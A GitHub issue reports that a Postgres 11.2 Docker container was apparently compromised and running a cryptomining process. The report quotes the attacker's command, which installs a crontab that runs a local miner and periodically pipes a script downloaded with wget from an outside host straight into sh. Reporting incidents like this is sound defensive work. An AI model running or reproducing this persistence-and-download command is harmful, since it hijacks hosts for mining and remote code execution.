-
Notifications
You must be signed in to change notification settings - Fork 1.2k
Closed
Labels
questionUsability question, not directly related to an error with the imageUsability question, not directly related to an error with the image
Description
Postgres 11.2 AMD64 image seems to be compromised and should be immediately removed from dockerhub. This image executes a cron job to mine cryptocurrencies, and possibly more. Might be worth auditing all variants in case.
cmd: echo "*/30 * * * * /var/lib/postgresql/data/./oka" > /tmp/a;echo "* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh">> /tmp/a; crontab /tmp/a;rm -rf /tmp/a
We noticed on our host machine that there was process running a suspicious script ./oka
. This processes was coming from a 2 day old postgres:11.2
docker container once we looked inside the container. We had to nuke the image and fs mounts, so nothing is left over, and rerunning locally I am not able to immediately see the same effect, could be the script only runs after a certain amount of time.
mirismaili
Metadata
Metadata
Assignees
Labels
questionUsability question, not directly related to an error with the imageUsability question, not directly related to an error with the image